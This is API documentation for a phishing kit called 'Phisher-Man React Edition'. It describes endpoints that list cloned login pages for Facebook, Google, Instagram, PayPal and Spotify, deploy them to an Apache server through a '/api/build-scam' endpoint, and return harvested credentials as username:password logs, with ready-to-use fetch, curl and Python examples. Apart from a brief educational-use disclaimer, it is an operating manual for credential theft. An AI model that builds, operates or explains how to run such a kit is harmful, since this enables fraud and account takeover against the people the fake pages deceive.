API Documentation
DISCLAIMER
IMPORTANT: This tool is for educational purposes and authorized testing only.
Use only on systems you own or have explicit permission to test.
Overview
The Phisher-Man React Edition provides a RESTful API for managing phishing templates, controlling the Apache server, and monitoring captured data.
Base URL: http://localhost:5000
Authentication
Currently, no authentication is required. For production use, implement proper authentication mechanisms.
Endpoints
1. Dashboard Data
GET /api/dashboard
Retrieves available phishing templates and their metadata.
Request:
GET /api/dashboard
Response:
{
"templates": [
{
"id": "facebook",
"name": "Facebook",
"logo": "/static/logos/facebook.jpg",
"description": "Facebook Login Page"
},
{
"id": "google",
"name": "Google",
"logo": "/static/logos/google.jpg",
"description": "Google Login Page"
},
{
"id": "instagram",
"name": "Instagram",
"logo": "/static/instagram.png",
"description": "Instagram Login Page"
},
{
"id": "paypal",
"name": "PayPal",
"logo": "/static/logos/paypal.jpeg",
"description": "PayPal Login Page"
},
{
"id": "spotify",
"name": "Spotify",
"logo": "/static/logos/spotify.jpg",
"description": "Spotify Login Page"
},
{
"id": "facebook-security",
"name": "Facebook Security",
"logo": "/static/logos/facebook.jpg",
"description": "Facebook Security Page"
}
]
}
Status Codes:
- 200 OK - Success
- 500 Internal Server Error - Server error
2. Server Status
GET /api/server/status
Checks the current status of the Apache2 server.
Request:
GET /api/server/status
Response:
{
"status": "running",
"message": "Apache2 is running"
}
Possible Status Values:
- "running" - Apache2 is active
- "stopped" - Apache2 is not running
- "error" - Error checking status
3. Server Control
POST /api/server/:action
Controls the Apache2 server (start, stop, clear).
Request:
POST /api/server/start
POST /api/server/stop
POST /api/server/clear
Parameters:
- action (path parameter) - Action to perform:
  - start - Start Apache2 service
  - stop - Stop Apache2 service
  - clear - Clear Apache document root
Response:
{
"success": true,
"message": "Apache2 started successfully"
}
Error Response:
{
"success": false,
"message": "Failed to start Apache2: Permission denied"
}
4. IP Information
GET /api/server/ip
Retrieves local and public IP addresses.
Request:
GET /api/server/ip
Response:
{
"localIP": "127.0.0.1",
"publicIP": "192.168.1.100"
}
IP Address Logic:
- localIP: Always returns 127.0.0.1
- publicIP: Automatically detected from the host's network interfaces
  - Priority: 192.168.x.x addresses first
  - Fallback: Any non-internal IPv4 address
  - Final fallback: 127.0.0.1
Note that, despite its name, publicIP is the address of a local interface (the sample response shows 192.168.1.100), not an Internet-routable public address, so the publicURL built from it is only reachable on the same network.
5. Deploy Template
POST /api/build-scam
Deploys a phishing template to the Apache server.
Request:
POST /api/build-scam
Content-Type: application/json
{
"template": "facebook"
}
Request Body:
{
"template": "string" // Template ID (facebook, google, instagram, paypal, spotify, facebook-security)
}
Response:
{
"success": true,
"message": "Template facebook deployed successfully",
"localIP": "127.0.0.1",
"publicIP": "192.168.1.100",
"localURL": "http://127.0.0.1/facebook/login.html",
"publicURL": "http://192.168.1.100/facebook/login.html",
"template": "facebook"
}
Deployment Process:
- Stop Apache2 service
- Clear the /var/www/html/ directory
- Create template-specific directory
- Copy template files
- Copy static assets (logos)
- Create index.html redirect
- Set proper permissions
- Start Apache2 service
6. Get Logs
GET /api/logs
Retrieves captured credentials from all deployed templates.
Request:
GET /api/logs
Response:
{
"logs": "=== FACEBOOK LOGS ===\nusername1:password1\nusername2:password2\n\n=== GOOGLE LOGS ===\nuser3:pass3\n\n"
}
Log Format:
- Each template section is labeled with === TEMPLATE_NAME LOGS ===
- Credentials are in the format username:password
- Multiple templates are separated by double newlines
Log File Locations:
/var/www/html/facebook/usernames.txt
/var/www/html/google/usernames.txt
/var/www/html/instagram/usernames.txt
/var/www/html/paypal/usernames.txt
/var/www/html/spotify/usernames.txt
/var/www/html/facebook-security/usernames.txt
Error Handling
Standard Error Response
{
"error": "Error message description"
}
Common Error Codes
- 400 Bad Request - Invalid request parameters
- 404 Not Found - Resource not found
- 500 Internal Server Error - Server-side error
Example Usage
JavaScript/Fetch
// Note: top-level await as used here requires an ES module or an async function.
// Get dashboard data
const response = await fetch('/api/dashboard');
const data = await response.json();
// Deploy template
const deployResponse = await fetch('/api/build-scam', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({ template: 'facebook' })
});
// Get logs
const logsResponse = await fetch('/api/logs');
const logs = await logsResponse.json();
cURL
# Get dashboard
curl http://localhost:5000/api/dashboard
# Deploy template
curl -X POST http://localhost:5000/api/build-scam \
-H "Content-Type: application/json" \
-d '{"template":"facebook"}'
# Get logs
curl http://localhost:5000/api/logs
# Start Apache
curl -X POST http://localhost:5000/api/server/start
Python
import requests
# Get dashboard
response = requests.get('http://localhost:5000/api/dashboard')
templates = response.json()
# Deploy template
deploy_response = requests.post(
    'http://localhost:5000/api/build-scam',
    json={'template': 'facebook'}
)
# Get logs
logs_response = requests.get('http://localhost:5000/api/logs')
logs = logs_response.json()
Security Considerations
Current Security Status
- ❌ No authentication required
- ❌ No rate limiting
- ❌ CORS allows all origins
- ❌ No input validation
- ❌ No HTTPS enforcement
Recommended Security Improvements
- Authentication: Implement JWT or session-based auth
- Rate Limiting: Use express-rate-limit
- Input Validation: Use joi or express-validator
- HTTPS: Force HTTPS in production
- CORS: Restrict to specific domains
- Logging: Implement security event logging
For API support, visit our Discord: https://discord.gg/KcuMUUAP5T